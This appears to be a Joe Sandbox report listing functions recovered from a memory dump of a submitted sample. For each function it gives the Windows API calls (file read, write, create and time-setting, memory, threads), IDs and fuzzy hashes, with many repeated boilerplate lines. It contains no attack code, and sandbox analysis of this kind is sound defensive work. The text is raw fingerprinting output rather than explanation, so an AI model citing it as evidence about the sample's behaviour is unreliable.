Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@$??2@ExceptionThrowmemmove
String ID:
API String ID: 4269121280-0
Opcode ID: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
Opcode Fuzzy Hash: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99

Function 0040A62F Relevance: 3.1, APIs: 2, Instructions: 135COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040A634
??3@YAXPAX@Z.MSVCRT(?), ref: 0040A729

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@H_prolog
String ID:
API String ID: 1329742358-0
Opcode ID: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
Opcode Fuzzy Hash: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B

Function 0040112B Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
Opcode Fuzzy Hash: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754

Function 0040D9F0 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
Instruction ID: d86f9e507f4e039952bd1031b0dc001be1b0661bb6f0ed5f18f0f7cd7a7605a3
Opcode Fuzzy Hash: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
Instruction Fuzzy Hash: FCF0B2B8A04208FFCB04CFA8D8448AE7BB9EB49314B2085A9F815A7390D735DA04DF64

Function 0040ECED Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0040ED05
_CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: AllocExceptionStringThrow
String ID:
API String ID: 3773818493-0
Opcode ID: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
Instruction ID: 896a1b371a95ab63a3f889c911e7bff8eb1facf706b7c8fcc1dab20228dace7a
Opcode Fuzzy Hash: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
Instruction Fuzzy Hash: CDE06D71600309ABDB10AF66D8419D67BE8EF00380B00C83FF948CA250E779E590C7D9

Function 0040E73A Relevance: 2.5, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0040E745
LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
Instruction ID: 086d926b78662e0ab04275255430a857868cdabe8091615e808f779c17768b54
Opcode Fuzzy Hash: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
Instruction Fuzzy Hash: 76F05436200214FBCB119F95DC08E9BBBB9FF49761F14842AF945E7260C771E821DBA4

Function 0040A7DE Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040A7E3

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
Instruction ID: 39d544f4fee3d18347c8ea8d59cce7c7d4ef222c74644271f89bd24cd9d44c54
Opcode Fuzzy Hash: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
Instruction Fuzzy Hash: 4B2180316003099BCB14EFA5C945AAE73B5EF40344F14843EF806BB291DB38DD16CB1A

Function 0040120B Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
Instruction ID: 5817d5120c2da98d16edaa91ace5ca285f5b3ff1e58b2ffd557e42fef7bfdc6e
Opcode Fuzzy Hash: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
Instruction Fuzzy Hash: 66F05E72100201DBC720AF98C840BA777F5BB84314F04483EE583F2AA0D778B885CB59

Function 00411A2D Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00411A32

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 05aa82fd4493c2954843b58147a6e12e638aaadf2772ca9641b0bace8f10624d
Instruction ID: 375caa893e42e0daca7b158ffe4b4b415bc54d3572d418f3e5e61c8e5be1c541
Opcode Fuzzy Hash: 05aa82fd4493c2954843b58147a6e12e638aaadf2772ca9641b0bace8f10624d
Instruction Fuzzy Hash: 30F0F272500109BBCF029F85D901AEEBB36EB48354F00811ABA1161160D33A9961AB99

Function 0040DA56 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990

CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
Instruction ID: 040011ad7fb3de3f437c6c7e3ebc1dcda5640d8293b7e84d035d3e38099293ab
Opcode Fuzzy Hash: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
Instruction Fuzzy Hash: A1E04F32140219ABCF215FA49C01BCA7B96AF09760F144526BE11A61E0C672D465AF94

Function 0040DB97 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
Instruction ID: ec3d056ad33d5175d1bee219b94afd5900c8108b90431a53c6143dcb1d381838
Opcode Fuzzy Hash: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
Instruction Fuzzy Hash: D7E0C275600208FBCB00CF95C801B9E7BBABB49755F10C069F918AA2A0D739AA10DF54

Function 0040653F Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_beginthreadex.MSVCRT ref: 00406552

Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ErrorLast_beginthreadex
String ID:
API String ID: 4034172046-0
Opcode ID: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
Instruction ID: fe95790bd269afcad05a26a3721163fc0b830ac61c9b3c5b6bbddf8a66cf2d64
Opcode Fuzzy Hash: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
Instruction Fuzzy Hash: 12D05EF6400208BFDF01DFE0DC05CAB3BADEB08204B004464FD05C2150E632DA108B60

Function 0040CC59 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040CC5E

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
Instruction ID: 312fbe8762c42e8d4a239ae194adb86e93363bc1e5443e54fb58aca6058f63a2
Opcode Fuzzy Hash: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
Instruction Fuzzy Hash: 70D05EB2A04108FBE7109F85D946BEEFB78EB80399F10823FB506B1150D7BC5A0196AD

Function 0040DADC Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54

Function 0040DB6A Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02

Function 0040E9F7 Relevance: 1.3, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?), ref: 0040EA24

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 97bd8de7a7fe9ad43a3345e9333d2138b4beb196f0434672ce39f7d09e0e15cd
Instruction ID: f56dbf57367ec124b55c1fed62106b1dafce564086f6503587e0b0fbfa293862
Opcode Fuzzy Hash: 97bd8de7a7fe9ad43a3345e9333d2138b4beb196f0434672ce39f7d09e0e15cd
Instruction Fuzzy Hash: EA21A271A00B009FC724CFAAC88485BF7F9FF88724764896EE49A93A40E774B945CB54

Function 0040E5D3 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(?,00414F84), ref: 0040E616

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ExceptionThrow
String ID:
API String ID: 432778473-0
Opcode ID: 85c4e5dde0f8cee934fbe77132b2d5831568e55a053817787dcfc8e06ea2b7f6
Instruction ID: f2b552c6dcb6979234feea5fe890f572eb9d388e9264680fa6f26452196acfb0
Opcode Fuzzy Hash: 85c4e5dde0f8cee934fbe77132b2d5831568e55a053817787dcfc8e06ea2b7f6
Instruction Fuzzy Hash: 20017171600701AFDB28CFBAD805997BBF8EF85314704496EE482D3651E374F946CB50

Function 0040F42D Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0040F446

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59

Function 00402F6C Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
Opcode Fuzzy Hash: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299

Function 0040D985 Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990

Memory Dump Source

